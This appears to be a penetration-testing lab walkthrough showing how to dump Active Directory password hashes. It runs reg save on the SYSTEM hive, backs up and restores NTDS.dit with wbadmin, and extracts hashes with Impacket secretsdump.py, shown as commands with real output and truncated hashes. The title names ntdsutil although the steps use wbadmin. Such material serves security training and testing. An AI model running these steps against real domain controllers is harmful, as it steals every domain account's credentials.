===================================================================================================================================
OS Credential Dumping (NTDS) using the Windows tool 'ntdsutil'
===================================================================================================================================

The objective is to extract the password hashes of all the domain accounts that are stored in the NTDS.dit file of a Domain Controller.
A valid domain account with high privileges  (e.g. member of the 'Domain admins' group or the 'Administrators' group of the Domain Controller)
is required to dump the NTDS.dit file and the registry hive 'HKLM\SYSTEM'.
By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\ntds.dit of a domain controller.

> Usefull link: https://attack.mitre.org/techniques/T1003/003/

Wbadmin is an elevated command prompt that allows administrators or backup operators to backup and restores an operating system (OS),
volume, files, folders, or applications.


-----------------------------------------------------------------------------------------------------------------------
Step 1. Log into the Domain Controller with a privileged account (e.g. Domain Admin)
-----------------------------------------------------------------------------------------------------------------------

Multiple options exist:
-----------------------
> RDP
> Wmiexec
> PowerShell remoting
> Psexec
> ...

-----------------------------------------------------------------------------------------------------------------------
Step 2. Extract/Copy the registry hive 'SYSTEM' using the Windows command 'reg save'
-----------------------------------------------------------------------------------------------------------------------

PS C:\temp> reg save HKLM\SYSTEM SYSTEM.hive
The operation completed successfully.

-----------------------------------------------------------------------------------------------------------------------
Step 3. Backup the NTDS.DIT file using the Windows command 'Wbadmin'
-----------------------------------------------------------------------------------------------------------------------

Notes
-----
To be able to run Wbadmin you need to use an elevated command prompt. To open an elevated command prompt, click Start, right-click 
Command Prompt, and then click Run as administrator.


PS C:\Windows\system32> wbadmin start backup -quiet -backuptarget:\\temp-dc\c$\temp\backup -include:c:\Windows\ntds

wbadmin 1.0 - Backup command-line tool
(C) Copyright 2013 Microsoft Corporation. All rights reserved.

Note: The backed up data cannot be securely protected at this destination.
Backups stored on a remote shared folder might be accessible by other people on the network. You should only save your backups to a location
where you trust the other users who have access to the location or on a network that has additional security precautions in place.

Retrieving volume information...
This will back up (C:) (Selected Files) to \\temp-dc\c$\temp\backup.
The backup operation to \\temp-dc\c$\temp\backup is starting.
Creating a shadow copy of the volumes specified for backup...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
Creating a backup of volume (C:), copied (100%).
Summary of the backup operation:
------------------

The backup operation successfully completed.
The backup of volume (C:) completed successfully.
Log of files successfully backed up:
C:\Windows\Logs\WindowsServerBackup\Backup-14-11-2021_21-20-48.log

-----------------------------------------------------------------------------------------------------------------------
Step 4. List the backup files
-----------------------------------------------------------------------------------------------------------------------

PS C:\Windows\system32> wbadmin get versions
wbadmin 1.0 - Backup command-line tool
(C) Copyright 2013 Microsoft Corporation. All rights reserved.

Backup time: 11/14/2021 10:20 PM
Backup location: Network Share labeled \\temp-dc\c$\temp\backup
Version identifier: 11/14/2021-21:20
Can recover: Volume(s), File(s)

-----------------------------------------------------------------------------------------------------------------------
Step 5. Restore the backuped NTDS.DIT file and collect it.
-----------------------------------------------------------------------------------------------------------------------

PS C:\Windows\system32> wbadmin start recovery -quiet -version:11/14/2021-21:20 -itemtype:file -items:c:\Windows\ntds\ntds.dit 
                        -recoverytarget:c:\temp\backup -notrestoreacl

wbadmin 1.0 - Backup command-line tool
(C) Copyright 2013 Microsoft Corporation. All rights reserved.

Retrieving volume information...
You have chosen to recover the file(s) c:\Windows\ntds\ntds.dit from the
backup created on 11/14/2021 10:20 PM to c:\temp\backup.
Preparing to recover files...

Successfully recovered c:\Windows\ntds\ntds.dit to c:\temp\backup\.
The recovery operation completed.
Summary of the recovery operation:
--------------------

Recovery of c:\Windows\ntds\ntds.dit to c:\temp\backup\ successfully completed.
Total bytes recovered: 60.01 MB
Total files recovered: 1
Total files failed: 0

Log of files successfully recovered:
C:\Windows\Logs\WindowsServerBackup\FileRestore-14-11-2021_21-24-41.log

PS C:\Windows\system32>

PS C:\temp\backup> ls

    Directory: C:\temp\backup

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----        11/14/2021  10:20 PM            WindowsImageBackup
-a---        11/14/2021  10:20 PM   62930944 ntds.dit

PS C:\temp\backup>

PS C:\temp\backup> ls "C:\temp\backup\WindowsImageBackup\TEMP-DC\Backup 2021-11-14 212048"

    Directory: C:\temp\backup\WindowsImageBackup\TEMP-DC\Backup 2021-11-14 212048

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        11/14/2021  10:20 PM  171966464 43f4e5b7-6e31-11e8-80b1-806e6f6e6963.vhdx
-a---        11/14/2021  10:20 PM        776 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_AdditionalFilesc3b9f3c7-5e52-4d5e-8b2                                             0-19adc95a34c7.xml
-a---        11/14/2021  10:20 PM       5534 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Components.xml
-a---        11/14/2021  10:20 PM       7670 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_RegistryExcludes.xml
-a---        11/14/2021  10:20 PM       3138 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writer0bada1de-01a9-4625-8278-69e735f                                             39dd2.xml
-a---        11/14/2021  10:20 PM       2310 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writer2707761b-2324-473d-88eb-eb007a3                                             59533.xml
-a---        11/14/2021  10:20 PM       3102 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writer4dc3bdd4-ab48-4d07-adb0-3bee292                                             6fd7f.xml
-a---        11/14/2021  10:20 PM       1488 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writer542da469-d3e1-473c-9f4f-7847f01                                             fc64f.xml
-a---        11/14/2021  10:20 PM       1628 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writer75dfb225-e2e4-4d39-9ac9-ffaff65                                            ddf06.xml
-a---        11/14/2021  10:20 PM       1484 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writera6ad56c2-b509-4e6c-bb19-49d8f43                                             532f0.xml
-a---        11/14/2021  10:20 PM       3828 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writerafbab4a2-367d-4d15-a586-71dbb18                                             f8485.xml
-a---        11/14/2021  10:20 PM       1850 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writerb2014c9e-8711-4c5c-a5a9-3cf3844                                             84757.xml
-a---        11/14/2021  10:20 PM       3986 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writerbe000cbe-11fe-4426-9c58-531aa63                                            55fc4.xml
-a---        11/14/2021  10:20 PM       1746 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writerd61d61c8-d73a-4eee-8cdd-f6f9786                                          b7124.xml
-a---        11/14/2021  10:20 PM    3975900 b7bc1b5f-25a3-48d3-bd67-e810bb183b42_Writere8132975-6f93-4464-a53e-1050253                                            ae220.xml
-a---        11/14/2021  10:20 PM        784 BackupSpecs.xml

PS C:\temp\backup>


-----------------------------------------------------------------------------------------------------------------------
Step 6. Download the dumped files on a Kali linux VM and use the tool 'Secretsdump.py' (impacket) to extract the hashes
-----------------------------------------------------------------------------------------------------------------------

> Extract the password hashes from the NTDS.DIT file using the SYSTEM registry hive and Secretsdump.py (Impacket) 

(kali@kali)-[/usr/share/doc/python3-impacket/examples]$ python3 secretsdump.py -ntds ntds.dit -system SYSTEM.hive LOCAL

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x941140bd825386b732031d5c5b01ae8a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: b175740e0908fe396a15b0dc5631e72a
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a558c1aa1212fb2dd<SNIP>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0<SNIP>
backup:1008:aad3b435b51404eeaad3b435b51404ee:1d6fcbd306077d663e23775e<SNIP>
TEMP-DC$:1009:aad3b435b51404eeaad3b435b51404ee:cf8e5ee10c7615bc73f4b2<SNIP>
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:208ae4a2c5aa7b40d04734994<SNIP>
Security-Test-Lab.Local\EDUARDO_MAXWELL:1112:aad3b435b51404eeaad3b435<SNIP>
Security-Test-Lab.Local\INES_TILLMAN:1113:aad3b435b51404eeaad3b435b51<SNIP>
Security-Test-Lab.Local\BRIDGET_BALLARD:1114:aad3b435b51404eeaad3b435<SNIP>
Security-Test-Lab.Local\RHONDA_EATON:1115:aad3b435b51404eeaad3b435b51<SNIP>
<SNIP>

